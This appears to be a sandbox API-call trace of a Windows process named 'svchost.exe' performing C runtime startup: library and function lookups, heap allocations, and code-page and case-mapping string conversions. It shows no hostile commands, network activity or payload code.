	[0198.240] QueryPerformanceCounter (in: lpPerformanceCount=0x22fc80 | out: lpPerformanceCount=0x22fc80*=27207845544) returned 1
	[0198.241] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1
	[0198.241] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0
	[0198.241] GetLastError () returned 0x57
	[0198.241] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x0) returned 0x6c330000
	[0198.242] GetProcAddress (hModule=0x6c330000, lpProcName="InitializeCriticalSectionEx") returned 0x0
	[0198.242] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0
	[0198.242] GetLastError () returned 0x57
	[0198.242] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x0) returned 0x0
	[0198.242] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0
	[0198.242] GetLastError () returned 0x57
	[0198.242] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76b10000
	[0198.242] GetProcAddress (hModule=0x76b10000, lpProcName="FlsAlloc") returned 0x76b6418d
	[0198.243] GetProcAddress (hModule=0x76b10000, lpProcName="FlsSetValue") returned 0x76b676e6
	[0198.243] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0
	[0198.243] GetLastError () returned 0x57
	[0198.243] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x0) returned 0x6c330000
	[0198.243] GetProcAddress (hModule=0x6c330000, lpProcName="InitializeCriticalSectionEx") returned 0x0
	[0198.243] GetProcessHeap () returned 0x370000
	[0198.243] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0
	[0198.243] GetLastError () returned 0x57
	[0198.243] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x0) returned 0x0
	[0198.243] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0
	[0198.243] GetLastError () returned 0x57
	[0198.244] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76b10000
	[0198.244] GetProcAddress (hModule=0x76b10000, lpProcName="FlsAlloc") returned 0x76b6418d
	[0198.244] GetLastError () returned 0x57
	[0198.244] GetProcAddress (hModule=0x76b10000, lpProcName="FlsGetValue") returned 0x76b61e16
	[0198.244] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x364) returned 0x38e0e8
	[0198.244] GetProcAddress (hModule=0x76b10000, lpProcName="FlsSetValue") returned 0x76b676e6
	[0198.244] SetLastError (dwErrCode=0x57) 
	[0198.244] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0xc00) returned 0x38e458
	[0198.245] GetStartupInfoW (in: lpStartupInfo=0x22fb54 | out: lpStartupInfo=0x22fb54*(cb=0x44, lpReserved="", lpDesktop="winsta0\\default", lpTitle="taskeng.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x81, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x100867e0, hStdOutput=0x1b3f4b48, hStdError=0xfffffffe)) 
	[0198.245] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0
	[0198.245] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0
	[0198.245] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0
	[0198.245] GetCommandLineA () returned="svchost.exe"
	[0198.245] GetCommandLineW () returned="svchost.exe"
	[0198.246] GetLastError () returned 0x57
	[0198.246] SetLastError (dwErrCode=0x57) 
	[0198.246] GetLastError () returned 0x57
	[0198.246] SetLastError (dwErrCode=0x57) 
	[0198.246] GetACP () returned 0x4e4
	[0198.246] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x220) returned 0x38dda0
	[0198.246] IsValidCodePage (CodePage=0x4e4) returned 1
	[0198.246] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x22fb84 | out: lpCPInfo=0x22fb84) returned 1
	[0198.246] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x22f44c | out: lpCPInfo=0x22f44c) returned 1
	[0198.246] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x22fa60, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256
	[0198.246] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x22fa60, cbMultiByte=256, lpWideCharStr=0x22f1e8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256
	[0198.246] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpCharType=0x22f460 | out: lpCharType=0x22f460) returned 1
	[0198.246] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x22fa60, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256
	[0198.246] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x22fa60, cbMultiByte=256, lpWideCharStr=0x22f198, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256
	[0198.246] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x0
	[0198.246] GetLastError () returned 0x57
	[0198.246] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x0) returned 0x0
	[0198.246] GetProcAddress (hModule=0x76b10000, lpProcName="LCMapStringEx") returned 0x76b9f72b
	[0198.246] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256
	[0198.247] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpDestStr=0x22ef88, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256
	[0198.247] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchWideChar=256, lpMultiByteStr=0x22f960, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\xec\x72\x13\x0b\x9c\xfb\x22", lpUsedDefaultChar=0x0) returned 256
	[0198.247] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x22fa60, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256
	[0198.247] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x22fa60, cbMultiByte=256, lpWideCharStr=0x22f1b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ脚ဉĀ") returned 256
	[0198.247] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ脚ဉĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256
	[0198.247] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ脚ဉĀ", cchSrc=256, lpDestStr=0x22efa8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ") returned 256
	[0198.247] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ", cchWideChar=256, lpMultiByteStr=0x22f860, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\xec\x72\x13\x0b\x9c\xfb\x22", lpUsedDefaultChar=0x0) returned 256
	[0198.247] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x80) returned 0x38dfc8
	[0198.247] RtlInitializeSListHead (in: ListHead=0x1010a9c0 | out: ListHead=0x1010a9c0) 
	[0198.247] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0198.247] GetProcAddress (hModule=0x76b10000, lpProcName="InitializeConditionVariable") returned 0x77389981
	[0198.247] GetProcAddress (hModule=0x76b10000, lpProcName="SleepConditionVariableCS") returned 0x76b418be
	[0198.247] GetProcAddress (hModule=0x76b10000, lpProcName="WakeAllConditionVariable") returned 0x773545a5
	[0198.247] RtlInitializeConditionVariable (in: ConditionVariable=0x1010a978 | out: ConditionVariable=0x1010a978) 
	[0198.247] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0198.248] GetProcAddress (hModule=0x76b10000, lpProcName="FlsAlloc") returned 0x76b6418d
	[0198.248] GetProcAddress (hModule=0x76b10000, lpProcName="FlsFree") returned 0x76b61f61
	[0198.248] GetProcAddress (hModule=0x76b10000, lpProcName="FlsGetValue") returned 0x76b61e16
	[0198.248] GetProcAddress (hModule=0x76b10000, lpProcName="FlsSetValue") returned 0x76b676e6
	[0198.248] GetProcAddress (hModule=0x76b10000, lpProcName="InitializeCriticalSectionEx") returned 0x76b63879
	[0198.248] GetProcAddress (hModule=0x76b10000, lpProcName="InitOnceExecuteOnce") returned 0x76b59601
	[0198.248] GetProcAddress (hModule=0x76b10000, lpProcName="CreateEventExW") returned 0x76b124d8
	[0198.248] GetProcAddress (hModule=0x76b10000, lpProcName="CreateSemaphoreW") returned 0x76b4db8b
	[0198.248] GetProcAddress (hModule=0x76b10000, lpProcName="CreateSemaphoreExW") returned 0x76b42111
	[0198.248] GetProcAddress (hModule=0x76b10000, lpProcName="CreateThreadpoolTimer") returned 0x76b4b009
	[0198.248] GetProcAddress (hModule=0x76b10000, lpProcName="SetThreadpoolTimer") returned 0x773589be
	[0198.248] GetProcAddress (hModule=0x76b10000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x7734c02a
	[0198.248] GetProcAddress (hModule=0x76b10000, lpProcName="CloseThreadpoolTimer") returned 0x7734c0d2
	[0198.248] GetProcAddress (hModule=0x76b10000, lpProcName="CreateThreadpoolWait") returned 0x76b43f78
	[0198.249] GetProcAddress (hModule=0x76b10000, lpProcName="SetThreadpoolWait") returned 0x77358bfb
	[0198.249] GetProcAddress (hModule=0x76b10000, lpProcName="CloseThreadpoolWait") returned 0x7734b567
	[0198.249] GetProcAddress (hModule=0x76b10000, lpProcName="FlushProcessWriteBuffers") returned 0x77375998
	[0198.249] GetProcAddress (hModule=0x76b10000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x77342251
	[0198.249] GetProcAddress (hModule=0x76b10000, lpProcName="GetCurrentProcessorNumber") returned 0x773428f6
	[0198.249] GetProcAddress (hModule=0x76b10000, lpProcName="CreateSymbolicLinkW") returned 0x76b99aa9
